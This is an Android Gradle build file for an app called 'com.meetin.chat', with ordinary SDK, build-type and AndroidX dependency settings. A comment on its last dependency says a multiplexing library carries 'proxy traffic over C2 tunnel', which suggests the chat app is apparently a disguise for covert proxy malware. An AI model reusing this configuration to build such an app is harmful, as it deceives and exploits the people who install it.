plugins {
    id 'com.android.application'
}

android {
    namespace 'com.meetin.chat'
    compileSdk 34

    defaultConfig {
        applicationId 'com.meetin.chat'
        minSdk 21
        targetSdk 34
        versionCode 3
        versionName '3.0'
    }

    buildTypes {
        debug {
            debuggable true
            minifyEnabled false
        }
        release {
            minifyEnabled true
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
        }
    }
    compileOptions {
        sourceCompatibility JavaVersion.VERSION_17
        targetCompatibility JavaVersion.VERSION_17
    }
}

dependencies {
    implementation 'androidx.appcompat:appcompat:1.6.1'
    implementation 'androidx.core:core:1.12.0'
    implementation 'androidx.constraintlayout:constraintlayout:2.1.4'

    // Yamux for multiplexing proxy traffic over C2 tunnel
    implementation 'com.github.hashicorp:yamux:0.1.0'
}
